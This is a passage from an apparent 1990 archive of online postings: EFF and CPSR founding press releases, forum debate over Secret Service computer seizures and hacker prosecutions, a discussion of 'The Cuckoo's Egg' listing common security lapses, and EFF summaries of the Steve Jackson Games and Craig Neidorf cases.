communications technologies, even as they struggle to master
or simply cope with them in the workplace and the home.
The Electronic Frontier Foundation has been established to
help civilize the electronic frontier; to make it truly useful
and beneficial not just to a technical elite, but to everyone;
and to do this in a way whic in keeping with our society's
highest traditions of the free and open flow of information
and communication.
To that end, the Electronic Frontier Foundation will:
1. Engage in and support educational activities which
increase popular understanding of the opportunities and
challenges posed by developments in computing and
telecommunications.
2. Develop among policy-makers a better understanding
of the issues underlying free and open telecommunications,
and support the creation of legal and structural approaches
which will ease the assimilation of these new technologies
by society.
3. Raise public awareness about civil liberties issues
arising from the rapid advancement in the area of new
computer-based communications media. Support litigation
in the public interest to preserve, protect, and extend
First Amendment rights within the realm of computing and
telecommunications technology.
4. Encourage and support the development of new tools
which will endow non-technical users with full and easy
access to computer-based telecommunications.
The Electronic Frontier Foundation
One Cambridge Center
Cambridge, MA 02142
(617) 577-1385
eff@well.sf.ca.us
hackers.44dejanr,
From: geoff@fernwood.mpk.ca.us (Geoff Goodfellow)
Newsgroups: comp.misc,comp.sys.ibm.pc,comp.sys.mac,comp.
society.futures,news.sys
Subject: NEW FOUNDATION ESTABLISHED TO ENCOURAGE COMPUTER-BASED
COMMUNICATIONS
Message-ID: <5122@fernwood.mpk.ca.us>
Date: 10 Jul 90 14:55:24 GMT
Followup-To: eff@well.sf.ca.us
Organization: Anterior Technology, Menlo Park, CA USA
Lines: 222
[Mitch Kapor asked me to post the following]
FOR IMMEDIATE RELEASE
Contact: Cathy Cook (415) 759-5578
NEW FOUNDATION ESTABLISHED TO ENCOURAGE COMPUTER-BASED
COMMUNICATIONS POLICIES
Washington, D.C., July 10, 1990 -- Mitchell D. Kapor, founder
of Lotus Development Corporation and ON Technology, today
announced that he, along with colleague John Perry Barlow, has
established a foundation address social and legal issues arising
from the impact on society of the increasingly pervasive use of
computers as a means of communication and information
distribution. The Electronic Frontier Foundation (EFF) will
support and engage in public education on current and future
developments in computer-based and telecommunications media.
In addition, it will support litigation in the public interest
to preserve, protect and extend First Amendment rights within
the realm of computing and telecommunications technology.
Initial funding for the Foundation comes from private
contributions by Kapor and Steve Wozniak, co-founder of Apple
Computer, Inc. The Foundation expects to actively raise
contributions from a wide constituency.
As an initial step to foster public education on these issues,
the Foundation today awarded a grant to the Palo Alto,
California-based public advocacy group Computer Professionals
for Social Responsibility (CPSR). The grant will be used by
CPSR to expand the scope of its on-going Computing and Civil
Liberties Project (see attached).
Because its mission is to not only increase public awareness
about civil liberties issues arising in the area of
computer-based communications, but also to support litigation
in the public interest, the Foundation has recently intervened
on behalf of two legal cases.
The first case concerns Steve Jackson, an Austin-based game
manufacturer who was the target of the Secret Service's
Operation Sun Devil. The EFF has pressed for a full
disclosure by the government regarding the seizure of
his company's computer equipment. In the second action, the
Foundation intends to seek amicus curiae (friend of the
court) status in the government's case against Craig
Neidorf, a 20-year-old University of Missouri student
who is the editor of the electronic newsletter Phrack
World News (see attached).
"It is becoming increasingly obvious that the rate of
technology advancement in communications is far outpacing
the establishment of appropriate cultural, legal and
political frameworks to handle the issues that are
arising," said Kapor. "And the Steve Jackson and Neidorf
cases dramatically point to the timeliness of the
Foundation's mission. We intend to be instrumental in helping
shape a new framework that embraces these powerful new
technologies for the public good."
The use of new digital media -- in the form of on-line
information and interactive conferencing services, computer
networks and electronic bulletin boards -- is becoming
widespread in businesses and homes. However, the electronic
society created by these new forms of digital communications
does not fit neatly into existing, conventional legal social
structures.
The question of how electronic communications should be accorded
the same political freedoms as newspapers, books, journals and
other modes of discourse is currently the subject of discussion
among this country's lawmakers and members of the computer
industry. The EFF will take an active role in these discussions
through its continued funding of various educational projects and
forums.
An important facet of the Foundation's mission is to help both
the public and policy-makers see and understand the opportunities
as well as the challenges posed by developments in computing and
telecommunications. Also, the EFF will encourage and support the
development of new software to enable non-technical users to more
easily use their computers to access the growing number of digital
communications services available.
The Foundation is located in Cambridge, Mass. Requests for
information should be sent to Electronic Frontier Foundation,
One Cambridge Center, Suite 300, Cambridge, MA 02142,
617/577-1385, fax 617/225-2347; or it can be reached at the
Internet mail address eff@well.sf.ca.us.
hackers.45dejanr,
FOR IMMEDIATE RELEASE
Contact: Marc Rotenberg (202) 775-1588
CPSR TO UNDERTAKE EXPANDED CIVIL LIBERTIES PROGRAM
Washington, D.C., July 10, 1990 -- Computer Professionals for
Social Responsibility (CPSR), a national computing organization,
announced today that it would receive a two-year grant in the
amount of $275,000 for its Computing and Civil Liberties
Project. The Electronic Frontier Foundation (EFF),founded
by Mitchell Kapor, made the grant to expand ongoing CPSR
work on civil liberties protections for computer users.
At a press conference in Washington today, Mr. Kapor
praised CPSR's work, "CPSR plays an important role in the
computer community. For last several years, it has sought
to extend civil liberties protections to new information
technologies. Now we want to help CPSR expand that work."
Marc Rotenberg, director of the CPSR Washington Office said,
"We are obviously very happy about the grant from the EFF.
There is a lot of work that needs to be done to ensure that
our civil liberties protections are not lost amidst policy
confusion about the use of new computer technologies."
CPSR said that it will host a series of policy round tables
in Washington, DC, during the next two years with lawmakers,
computer users, including (hackers), the FBI, industry
representatives, and members of the computer security
community. Mr. Rotenberg said that the purpose of the
meetings will be to "begin a dialogue about the new uses
of electronic media and the protection of the public
interest."
CPSR also plans to develop policy papers on computers and
civil liberties, to oversee the Government's handling of
computer crime investigations, and to act as an information
resource for organizations and individuals interested in
civil liberties issues.
The CPSR Computing and Civil Liberties project began in 1985
after President Reagan attempted to restrict access to
government computer systems through the creation of new
classification authority. In 1988, CPSR prepared a report
on the proposed expansion of the FBI's computer system, the
National Crime Information Center. The report found serious
threats to privacy and civil liberties. Shortly after the
report was issued, the FBI announced that it would drop a
proposed computer feature to track the movements of people
across the country who had not been charged with any crime.
"We need to build bridges between the technical community
and the policy community," said Dr. Eric Roberts, CPSR
president and a research scientist at Digital Equipment
Corporation in Palo Alto, California. "There is simply
too much misinformation about how computer networks
operate. This could produce terribly misguided public
policy."
CPSR representatives have testified several times before
Congressional committees on matters involving civil liberties
and computer policy. Last year CPSR urged a House Committee to
avoid poorly conceived computer activity. "In the rush to
criminalize the malicious acts of the few we may discourage
the beneficial acts of the many," warned CPSR. A House
subcommittee recently followed CPSR's recommendations on
computer crime amendments.
Dr. Ronni Rosenberg, an expert on the role of computer
scientists and public policy, praised the new initiative.
She said, "It's clear that there is an information gap
that needs to be filled. This is an important opportunity
for computer scientists to help fill the gap."
CPSR is a national membership organization of computer
professionals, based in Palo Alto, California. CPSR has
over 20,000 members and 21 chapters across the country.
In addition to the civil liberties project, CPSR conducts
research, advises policy makers and educates the public
about computers in the workplace, computer risk and
reliability, and international security.
For more information contact:
Marc Rotenberg
CPSR Washington Office
1025 Connecticut Avenue, NW
Suite 1015
Washington, DC 20036 202/775-1588
Gary Chapman
CPSR National Office
P.O. Box 717
Palo Alto, CA 94302
415/322-3778
hackers.46dejanr,
Msg#:24282 *POLITICAL FORUM*
07-12-90 10:50:29
From: TONY CREMONESE
To: ALL
Subj: COMPUTER SEARCH & SEIZURE, PT 1
Please post this without attribution to me (anonymously). I've
gotten too much hate mail and nuisance phone calls from hackers
to want more, and from the postings I've seen here, that type of
person may be the majority of your audience.
-------------------------------------------------------------------
Following are various random thoughts and reactions of a retired
semi-hacker to thingsthat have appeared in the digest of late:
1) Quoting the maximum possible penalty for various crimes is not
"fair" in the sense that those maximum sentences are seldom
imposed. Saying that the LoD folks, with no prior record, and
(apparently) minimal or no damage caused, are going to face 50
years in prison, is an attempt to incite the reader. Most of
those laws specify a range of penalties that reflect the severity
of the crime. For instance, Robert Morris (who did more damage
than the LoD folks, as near as I can tell) only got a token fine
and a probated sentence. If the LoD folks even get convicted
(doubtful, I would guess), then their sentence cannot possibly
be the maximum. Federal sentencing guidelines would not allow
it, and no judicial review would uphold it.
The extreme penalties are in place for extreme crimes. If
someone mucked about with a computer and caused multiple deaths,
or crashed the FedWire computers for a half day -- that would
be more deserving of a major sentence.
The law is written to cover a range. Let's try to be more
realistic about this aspect of things, okay?
2) Confiscation of equipment during search warrants. Well, how
would YOU do it? Pretend you are a Federal agent. Figure that
you have to search for evidence of wrong-doing on the computer
system of someone who you (rightly or wrongly) suspect has been
involved in illegal computer activity.
Let's leave behind the question of whether the search warrants
of late are justified or not, or whether the agents involved
have been overdoing; doesn't matter for this little exercise.
Instead, put yourself in the role of the person who has sufficient
reason so suspect someone of a crime that it is your duty to
investigate. You need to be thorough, and find the evidence if
it is there. You are a Fed with a valid, fair search warrant.
Consider some of the problems:
* There may be gigabytes of information on disks, tapes, and
optical media that has to be searched, file by file.
* You also have to search the "free list" where files may
have been deleted because sometimes evidence is found there.
You need to do this on every disk, using something like
Norton Utilities.
* You may have to try to decrypt some files, or figure out
what format they use.
* Some evidence may be hidden in other ways on the machine
(use your imagination a little here -- I'm sure you can think of
some ways to do it). You have to search it out.
You've only got one or two people to search the machine, but
those persons are also assigned to a dozen other cases. Could
you do a comprehensive search in a few days? A week? To do
an effective search of that much material would probably take
many, many weeks. And remember, the person whose equipment you
arr searching is somewhat (or very) knowledgeable, and has probably
tried to hide the information in some way, so you have to work
extra hard to search. Sure they're bitching and moaning about how
they can't continue their business without their equipment, but
what can *you* do about it if you are going to do your job right?
Then there are other problems:
* The machine you are searching may have non-standard hardware
and software. You can't just transfer the disks to another machine
and read them. If nothing else, the heads may be out of alignment
on the suspect's machine, making the disks unreadable anywhere else.
* The machines you are searching may require special peripherals
to print/run/read data. Your system doesn't have an optical disk,
or 8mm tape unit, or maybe even a 3.25 disk drive.
* You have a small budget for equipment and don't have anything
big enough or fast enough to search the data created by complex
machines being searched.
* You don't have the budget or time to make copies of all the
data and take the data with you (even in bulk quantities and high
speed, how much would it take for you to copy 500Mb onto floppies?)
* Because of chain of custody requirements for the search, you
have to be able to certify that the evidence was under the control
of responsible people the whole time from the execution of the
warrant up until the introduction of trial. That means you can't
go home for the night, then come back the next day.
* You can't ask the suspect to help -- he may have function
keys, booby-traps, or other things in place to erase or alter the
evidence you're after. You can't let him near the system, or even
near anything that might signal to the system.
How do you address these issues? By taking the whole set of
equipment involved in the search and using it to do the searching
and printing. You know it is compatible with the data you are
searching, and it probably has sufficient capacity to do the
search.
Suppose you find incriminating evidence, or at least material
that needs to be presented as evidence. What do you do? Well,
you can't just print it out or make a floppy copy and then hand
the machine back. There is a concept of "best evidence" involved
that means you probably need the original form. Plus, naive
jurors have a hard time relating the data, the original
computer, and copies of the data; defense lawyers like to
capitalize on that. Take a copy into court, and an ignorant
judge might rule that it can't be used in evidence.
How to address the problem? Keep the machine and storage until
after the trial.
It is very easy for people to criticize the law enforcement
personnel for their searches. Perhaps they *should* be criticized
for their selection of suspects and their flair for dramatics,
in some (many?) cases. But if you are going to criticize, then
come up with a *reasonable* alternative that can be used.
I originally thought that seizure of the equipment was too
extreme, but the more I thought about the problem, the more
I realized that in many cases the authorities have no choice
if they are to do a thorough and useful search. I know that
if someone wanted to search my systems, it would take them
weeks. Heck, I have so much stuff on disk and tape, it
sometimes takes me more than a day to find what I want, and
I'm the one who organized it all!
3) Prosecution, etc.
Suppose you have evidence that someone had broken into the
computers at Bank XYZ and made copies of a few harmless files.
What do you do? Well, one thing is for certain. You don't
believe them if they say they were only looking around. If
you did, then *everyone* caught trespassing or committing
larceny would use the same line. Everybody "casing" the
system for a later. major theft would make the same claim
-- they were just looking. How do you prove otherwise?
So, do you wait for them to get back on and steal something
important or cause major damage?
No, that has obvious drawbacks, too. If you have the evidence
that a crime has been committed, then you prosecute it before
a larger crime is committed. It may look petty, but you
don't take chances with other people's property or lives
I'm not going to start a debate on whether or not charges
in a certain case are too extreme, or whether the law
provides too harsh a penalty for some transgressions.
Besides, we might all agree on that. :-) However, from
a standpoint of security, you never want to allow
unauthorized people to snoop on your system, whether
they are causing harm or not; from a law enforcement
view, you don't wait for people to commit repeated major
felonies if you can nail them on what they've already done.
Because people steal and lie, it makes it impossible to give
the benefit of the doubt to the majority who really don't
mean much harm. My machine has been broken into and
sabotaged; as such, I will never again believe anyone who
claims they were "just looking" and I will prosecute
trespassers if I can. That's too bad for the harmless
hacker, but the harmless hacker had better realize that
assholes have spoiled the environment we all once enjoyed.
The more people keep breaking into systems, or worse, the
more the lawmakers and law enforcement type are going to
press back and make noise about the problems. Think it's
bad now?
Then just keep hacking into systems and provide ammunition
to the know-nothings who may start suggesting laws like
registration of modems or licensing people to have PCs.
4) Definitions, the law, etc.
First of all, I'm not surprised that you have so little comment
in this list from law enforcement types and others of their
mind-set. Part of that may be due to the fact that they don't
have network access. Believe it or not, there are only a few
dozen Fed agents with the computer expertise to know how to
access the net. And the US Govt has not allocated much in
the way of funds to build up computers and technology for law
enforcement. Just because they're the govt doesn't mean they
have lots of equipment, personnel, or training. Believe me, I
speak from first-hand experience on this.
There's another reason, too, and it's related to my request to
post this anonymously. I believe myself to be fairly middle
of the road on many of these legal issues, and what I've read
so far in this digest is very extreme (and sometimes insulting)
to people in law enforcement. I wonder if people on this list
can be objective enough to try to see the other side of the
issue -- is it worth my while to try to suggest even so much
as balance here?
Again, it is very easy to criticize, but I don't see anyone
trying to think objectively about the underlying problems and
try to suggest better solutions. The base problem isn't that
there are "evil" law enforcement people out there trying to
bash computer users. It's because there are irresponsible
people breaking the law, and the law enforcement folks are
unsophisticated and uneducated about what they're trying to
stop.
Yes, there is no question that there are abuses of the law and
the system. Yes, there is no question that there are some
problems with the system. Yes, there is no questionthat there
are some stuck-up people in the legal system who enjoy
bullying others.
BUT
There are also people breaking into systems they have no right
to access...and it doesn't matter why they do it or whether
they harm anything, it is wrong and illegal. There are
people committing fraud against banks, credit card companies,
and telecommunications companies -- against all of us. There
are instances of industrial and political espionage going on.
There are computer-run racist hate groups, kiddie porn rings,
and conspiracies to commit all kinds of awful things.
How would you write the laws so that illegal activity could be
prosecuted appropriately without endangering the rights of
the innocent? Instead of being critical, let's see some of
you "authorities" apply your expertise to something constructive!
Suggest how we can write good laws that work but can't be abused.
This would be a good forum for that. If we come up with some
good suggestions, I suspect we could even get them into more
appropriate forums. But we have to have reasonable ideas,
first, not simply cries of "foul" that fail to acknowledge
that there are real criminals out there amongst the rest of us.
hackers.47dejanr,
Msg#:24292 *POLITICAL FORUM*
07-12-90 14:58:09
From: JIM TRUDEAU
To: TONY CREMONESE
Subj: REPLY TO MSG# 24283 (COMPUTER SEARCH & SEIZURE, PT 2)
I suspect our anonymous informant is a law enforcement person,
because he seems to know whereof he speaks. His points about
the chain of custody of evidence, and the requirement for
originals in court are absolutely correct. And the point
concerning the media hype about maximum possible sentence
if given the full penalty and consecutive sentences is also
right on. It rarely happens, if ever (although I'm sure Jim
Bakker would argue with me about that along with his new
friends). This makes an interesting contrast to the very
well written article (Hack.arc?) uploaded here recently.
They refer to the same folks, the legion of doom (LoD).
Both authors agree that what's going on here is that the
cops don't know doodoo from donuts about computers, and
some serious education is needed here before we all
end up in trouble.
hackers.48dejanr,
==========================
security/main #801, from roedy, 947 chars,
Wed Jul 18 18:03:54 1990
There is/are comment(s) on this message.
--------------------------
TITLE: The Cuckoo's Egg
I stayed up this 7:30 AM reading this tale of tracking down a
hacker. Sprinkled in the story was info on security leaks.
1. In VAX and Unix software often comes with accounts set up with
default passwords. Managers fail to change them to something
unique.
2. People put high level passwords and access procedures in files
and EMAIL that can be intercepted by hackers.
3. Priviledged programs often have bugs so they can be tricked
into opening the security door. Manufacturers don't like braying
to loudly when they send out the fixes. So the fixes never get
applied.
4. Trap-door encrypted passwords can be cracked by stealing the
password file, then encrypting every word in the dictionary and
looking for matches. This is why you should never use English
words or names as passwords.
5. The easiest way to get high level passwords is to set up a
program that mimics the standard logon.
==========================
security/main #802, from bstrauss, 94 chars,
Wed Jul 18 18:22:21 1990
This is a comment to message 801.
There are additional comments to message 801.
--------------------------
All very simple security precautions - which a shocking few systems
implement...
-----Burton
==========================
security/main #803, from hkenner, 71 chars,
Wed Jul 18 19:56:30 1990
This is a comment to message 801.
There is/are comment(s) on this message.
--------------------------
Roedy, didn't you see my review of that (excellent) book in BYTE?
--HK
==========================
security/main #804, from p.schmidt, 918 chars,
Wed Jul 18 20:06:37 1990
This is a comment to message 799.
There is/are comment(s) on this message.
--------------------------
I read (or at least skimmed) a fair portion of the file, and intend
to read more later. The article is obviously (to me) slanted; it
makes the crackers out to be somewhat unruly but essentially
innocent kids. Well, maybe the majority of them are. However.
1) I can't trust this group of crackers to _not_ do anything
truly dangerous.
2) Even if they do not have the power to trash my credit rating,
hearing a threat to do so would elicit a great deal of fear.
I compare this to someone who claims to a bank teller that
s/he has a bomb, even if s/he doesn't.
I'm sorry if a crackdown curtails some otherwise innocent,
harmless, and possibly educational activities for some people.
We can't tell from here that they _are_ truly harmless.
OTOH, I'm willing to accept that some of the crackdowns/seizures
have been handled overzealously and ignorantly. We do need computer
literate law officers in a big way.
==========================
security/main #805, from roedy, 211 chars,
Wed Jul 18 20:13:44 1990
This is a comment to message 803.
--------------------------
No, I didn't, but I was talking with a guy who wanted some
password protected modems about the book. He had seen it
but could not remember which publication. Byte and PC are
beginning to look too much alike.
==========================
security/main #806, from roedy, 435 chars,
Wed Jul 18 20:17:21 1990
This is a comment to message 804.
There is/are comment(s) on this message.
--------------------------
If you read the book in full you will find your first impression
is the exact opposite of the author's. He was frustrated to pieces
he could not convince others what he was seeing was a criminal
violation -- an act of vandalism. Whenever he watched the hacker
break into medical computers he sounds RED with fury.
He rewrote an emotionally neutral set of FBI questions into
flesh and blood language. "penetrator" became "eggsucker".
==========================
security/main #807, from hshubs, 85 chars,
Wed Jul 18 21:06:59 1990
This is a comment to message 806.
--------------------------
Paul appears to be referring to the message in 'mac.hack/long.stuff',
not the book.
hackers.49dejanr,
TITLE: Electronic Frontier Foundation Case Summaries
Date: Sat, 21 Jul 90 12:01:33 PDT
Sender: well!jef@apple.com
Status: R
The following is a discussion of legal issues currently engaged by
the Electronic Frontier Foundation. It is about 30k.
ELECTRONIC FRONTIER FOUNDATION
LEGAL CASE SUMMARY July 10, 1990
The Electronic Frontier Foundation is currently providing litigation
support in two cases in which it perceived there to be substantial
civil liberties concerns which are likely to prove important in the
overall legal scheme by which electronic communications will, now
and in the future, be governed, regulated, encouraged, and
protected.
Steve Jackson Games
Steve Jackson Games is a small, privately owned adventure game
manufacturer located in Austin, Texas. Like most businesses today,
Steve Jackson Games uses computers for word processing and
bookkeeping. In addition, like many other manufacturers, the company
operates an electronic bulletin board to advertise and to obtain
feedback on its product ideas and lines.
One of the company's most recent products is GURPS CYBERPUNK, a
science fiction role-playing game set in a high-tech futuristic
world. The rules of the game are set out in a game book. Playing of
the game is not performed on computers and does not make use of
computers in any way. This game was to be the company's most
important first quarter release, the keystone of its line.
On March 1, 1990, just weeks before GURPS CYBERPUNK was due to be
released, agents of the United States Secret Service raided the
premises of Steve Jackson Games. The Secret Service:
* seized three of the company's computers which were used in the
drafting and designing of GURPS CYBERPUNK, including the computer
used to run the electronic bulletin board,
* took all of the company software in the neighborhood of the
computers taken,
* took with them company business records which were located on the
computers seized, and
* destructively ransacked the company's warehouse, leaving many
items in disarray.
In addition, all working drafts of the soon-to-be-published GURPS
CYBERPUNK game book -- on disk and in hard-copy manuscript form --
were confiscated by the authorities. One of the Secret Service
agents told Steve Jackson that the GURPS CYBERPUNK science fiction
fantasy game book was a, "handbook for computer crime."
Steve Jackson Games was temporarily shut down. The company was
forced to lay-off half of its employees and, ever since the raid, has
operated on relatively precarious ground.
Steve Jackson Games, which has not been involved in any illegal
activity insofar as the Foundation's inquiries have been able to
determine, tried in vain for over three months to find out why its
property had been seized, why the property was being retained by the
Secret Service long after it should have become apparent to the
agents that GURPS CYBERPUNK and everything else in the company's
repertoire were entirely lawful and innocuous, and when the company's
vital materials would be returned. In late June of this year, after
attorneys for the Electronic Frontier Foundation became involved in
the case, the Secret Service finally returned most of the property,
but retained a number of documents, including the seized drafts of
GURPS CYBERPUNKS.
The Foundation is presently seeking to find out the basis for the
search warrant that led to the raid on Steve Jackson Games.
Unfortunately, the application for that warrant remains sealed by
order of the court. The Foundation is making efforts to unseal those
papers in order to find out what it was that the Secret Service told
a judicial officer that prompted that officer to issue the search
warrant.
Under the Fourth Amendment to the United States Constitution, a
search warrant may be lawfully issued only if the information
presented to the court by the government agents demonstrates
"probable cause" to believe that evidence of criminal conduct would
be found on the premises to be searched. Unsealing the search
warrant application should enable the Foundation's lawyers,
representing Steve Jackson Games, to determine the theory by which
Secret Service Agents concluded or hypothesized that either the GURPS
CYBERPUNK game or any of the company's computerized business records
constituted criminal activity or contained evidence of criminal
activity.
Whatever the professed basis of the search, its scope clearly seems
to have been unreasonably broad. The wholesale seizure of computer
software, and subsequent rummaging through its contents, is
precisely the sort of general search that the Fourth Amendment was
designed to prohibit.
If it is unlawful for government agents to indiscriminately seize all
of the hard-copy filing cabinets on a business premises -- which it
surely is -- that the same degree of protection should apply to
businesses that store information electronically.
The Steve Jackson Games situation appears to involve First Amendment
violations as well. The First Amendment to the United States
Constitution prohibits the government from "abridging the freedom of
speech, or of the press". The government's apparent attempt to
prevent the publication of the GURPS CYBERPUNK game book by seizing
all copies of all drafts in all media prior to publication, violated
the First Amendment. The particular type of First Amendment
violation here is the single most serious type, since the government,
by seizing the very material sought to be published, effectuated what
is known in the law as a "prior restraint" on speech. This means
that rather than allow the material to be published and then seek to
punish it, the government sought instead to prevent publication in
the first place. (This is not to say, of course, that anything
published by Steve Jackson Games could successfully have been
punished. Indeed, the opposite appears to be the case, since SJG's
business seems to be entirely lawful.) In any effort to restrain
publication, the government bears an extremely heavy burden of proof
before a court is permitted to authorize a prior restraint.
Indeed, in its 200-year history, the Supreme Court has never upheld a
prior restraint on the publication of material protected by the
First Amendment, warning that such efforts to restrain publication
are presumptively unconstitutional. For example, the Department of
Justice was unsuccessful in 1971 in obtaining the permission of the
Supreme Court to enjoin The New York Times, The Washington Post, and
The Boston Globe from publishing the so-called Pentagon Papers, which
the government strenuously argued should be enjoined because of a
perceived threat to national security. (In 1979, however, the
government sought to prevent The Progressive magazine from publishing
an article purporting to instruct the reader as to how to manufacture
an atomic bomb. A lower federal court actually imposed an order for
a temporary prior restraint that lasted six months. The Supreme
Court never had an opportunity to issue a full ruling on the
constitutionality of that restraint, however, because the case was
mooted when another newspaper published the article.)
Governmental efforts to restrain publication thus have been met by
vigorous opposition in the courts. A major problem posed by the
government's resort to the expedient of obtaining a search warrant,
therefore, is that it allows the government to effectively prevent or
delay publication without giving the citizen a ready opportunity to
oppose that effort in court.
The Secret Service managed to delay, and almost to prevent, the
publication of an innocuous game book by a legitimate company -- not
by asking a court for a prior restraint order that it surely could
not have obtained, but by asking instead for a search warrant, which
it obtained all too readily.
The seizure of the company's computer hardware is also problematic,
for it prevented the company not only from publishing GURPS
CYBERPUNK, but also from operating its electronic bulletin board.
The government's action in shutting down such an electronic bulletin
board is the functional equivalent of shutting down printing presses
of The New York Times or The Washington Post in order to prevent
publication of The Pentagon Papers. Had the government sought a
court order closing down the electronic bulletin board, such an order
effecting a prior restraint almost certainly would have been refused.
Yet by obtaining the search warrant, the government effected the same
result.
This is a stark example of how electronic media suffer under a less
stringent standard of constitutional protection than applies to the
print media -- for no apparent reason, it would appear, other than
the fact that government agents and courts do not seem to readily
equate computers with printing presses and typewriters. It is
difficult to understand a difference between these media that should
matter for constitutional protection purposes. This is one of the
challenges facing the Electronic Frontier Foundation.
The Electronic Frontier Foundation will continue to press for return
of the remaining property of Steve Jackson Games and will take
formal steps, if necessary, to determine the factual basis for the
search. The purpose of these efforts is to establish law applying
the First and Fourth Amendments to electronic media, so as to
protect in the future Steve Jackson Games as well as other
individuals and businesses from the devastating effects of unlawful
and unconstitutional government intrusion upon and interference
with protected property and speech rights.
hackers.50dejanr,
United States v. Craig Neidorf
Craig Neidorf is a 20-year-old student at the University of Missouri
who has been indicted by the United States on several counts of
interstate wire fraud and interstate transportation of stolen
property in connection with his activities as editor and publisher
of the electronic magazine, Phrack.
The indictment charges Neidorf with: (1) wire fraud and interstate
transportation of stolen property for the republication in Phrack of
information which was allegedly illegally obtained through the
accessing of a computer system without authorization, though it was
obtained not by Neidorf but by a third party; and (2) wire fraud for
the publication of an announcement of a computer conference and for
the publication of articles which allegedly provide some suggestions
on how to bypass security in some computer systems.
The information obtained without authorization is a file relating to
the provision of 911 emergency telephone services that was allegedly
removed from the BellSouth computer system without authorization. It
is important to note that neither the indictment, nor any briefs
filed in this case by the government, contain any factual allegation
or contention that Neidorf was involved in or participated in the
removal of the 911 file.
These indictments raise substantial constitutional issues which have
significant impact on the uses of new computer communications
technologies. The prosecution of an editor or publisher, under
generalized statutes like wire fraud and interstate transportation
of stolen property, for the publication of information received
lawfully, which later turns out to be have been "stolen," presents an
unprecedented threat to the freedom of the press. The person who
should be prosecuted is the thief, and not a publisher who
subsequently receives and publishes information of public interest.
To draw an analogy to the print media, this would be the equivalent
of prosecuting The New York Times and The Washington Post for
publishing the Pentagon Papers when those papers were dropped off at
the doorsteps of those newspapers.
Similarly, the prosecution of a publisher for wire fraud arising out
of the publication of articles that allegedly suggested methods of
unlawful activity is also unprecedented. Even assuming that the
articles here did advocate unlawful activity, advocacy of unlawful
activity cannot constitutionally be the basis for a criminal
prosecution, except where such advocacy is directed at producing
imminent lawless action, and is likely to incite such action. The
articles here simply do not fit within this limited category. The
Supreme Court has often reiterated that in order for advocacy to be
criminalized, the speech must be such that the words trigger an
immediate action. Criminal prosecutions such as this pose an
extreme hazard for First Amendment rights in all media of
communication, as it has a chilling effect on writers and publishers
who wish to discuss the ramifications of illegal activity, such as
information describing illegal activity or describing how a crime
might be committed.
In addition, since the statutes under which Neidorf is charged
clearly do not envision computer communications, applying them to
situations such as that found in the Neidorf case raises fundamental
questions of fair notice -- that is to say, the publisher or
computer user has no way of knowing that his actions may in fact be
a violation of criminal law. The judge in the case has already
conceded that "no court has ever held that the electronic transfer of
confidential, proprietary business information from one computer to
another across state lines constitutes a violation of [the wire
fraud statute]." The Due Process Clause prohibits the criminal
prosecution of one who has not had fair notice of the illegality of
his action. Strict adherence to the requirements of the Due Process
Clause also minimizes the risk of selective or arbitrary enforcement,
where prosecutors decide what conduct they do not like and then seek
some statute that can be stretched by some theory to cover that
conduct.
Government seizure and liability of bulletin board systems
During the recent government crackdown on computer crime, the
government has on many occasions seized the computers which operate
bulletin board systems ("BBSs"), even though the operator of the
bulletin board is not suspected of any complicity in any alleged
criminal activity. The government seizures go far beyond a "prior
restraint" on the publication of any specific article, as the
seizure of the computer equipment of a BBS prevents the BBS from
publishing at all on any subject. This akin to seizing the word
processing and computerized typesetting equipment of The New York
Times for publishing the Pentagon Papers, simply because the
government contends that there may be information relating to the
commission of a crime on the system. Thus, the government does not
simply restrain the publication of the "offending" document, but it
seizes the means of production of the First Amendment activity so
that no more stories of any type can be published.
The government is allowed to seize "instrumentalities of crime," and
a bulletin board and its associated computer system could arguably be
called an instrumentality of crime if individuals used its private
e-mail system to send messages in furtherance of criminal activity.
However, even if the government has a compelling interest in
interfering with First Amendment protected speech, it can only do so
by the least restrictive means. Clearly, the wholesale seizure and
retention of a publication's means of production, i.e., its computer
system, is not the least restrictive alternative. The government
obviously could seize the equipment long enough to make a copy of the
information stored on the hard disk and to copy any other disks and
documents, and then promptly return the computer system to the
operator.
Another unconstitutional aspect of the government seizures of the
computers of bulletin board systems is the government infringement on
the privacy of the electronic mail in the systems. It appears that
the government, in seeking warrants for the seizures, has not
forthrightly informed the court that private mail of third parties is
on the computers, and has also read some of this private mail after
the systems have been seized.
The Neidorf case also raises issues of great significance to bulletin
board systems. As Neidorf was a publisher of information he
received, BBSs could be considered publishers of information that its
users post on the boards. BBS operators have a great deal of
concern as to the liability they might face for the dissemination of
information on their boards which may turn out to have been obtained
originally without authorization, or which discuss activity which may
be considered illegal. This uncertainty as to the law has already
caused a decrease in the free flow of information, as some BBS
operators have removed information solely because of the fear of
liability.
The Electronic Frontier Foundation stands firmly against the
unauthorized access of computer systems, computer trespass and
computer theft, and strongly supports the security and sanctity of
private computer systems and networks. One of the goals of the
Foundation, however, is to ensure that, as the legal framework is
established to protect the security of these computer systems, the
unfettered communication and exchange of ideas is not hindered. The
Foundation is concerned that the Government has cast its net too
broadly, ensnaring the innocent and chilling or indeed supressing the
free flow of information. The Foundation fears not only that
protected speech will be curtailed, but also that the citizen's
reasonable expectation in the privacy and sanctity of electronic
communications systems will be thwarted, and people will be hesitant
to communicate via these networks. Such a lack of confidence in
electronic communication modes will substantially set back the kind
of experimentation by and communication among fertile minds that are
essential to our nation's development. The Foundation has therefore
applied for amicus curiae (friend of the court) status in the
Neidorf case and has filed legal briefs in support of the First
Amendment issues there, and is prepared to assist in protecting the
free flow of information over bulletin board systems and other
computer technologies.
For further information regarding Steve Jackson Games please contact:
Harvey Silverglate or Sharon Beckman Silverglate & Good 89 Broad
Street, 14th Floor Boston, MA 02110 617/542-6663
For further information regarding Craig Neidorf please contact:
Terry Gross or Eric Lieberman Rabinowitz, Boudin, Standard, Krinsky
and Lieberman 740 Broadway, 5th Floor New York, NY 10003 212/254-1111
hackers.52dejanr,
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.27 (Aug 9, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer (TK0JUT2@NIU.bitnet)
ARCHIVISTS: Bob Krause / Alex Smith
USENET readers can currently receive CuD as alt.society.cu-digest.
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views. CuD material may be reprinted as long as the source is
cited. It is assumed that non-personal mail to the moderators may be
reprinted, unless otherwise specified. Readers are encouraged to submit
reasoned articles relating to the Computer Underground.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
DISCLAIMER: The views represented herein do not necessarily represent the
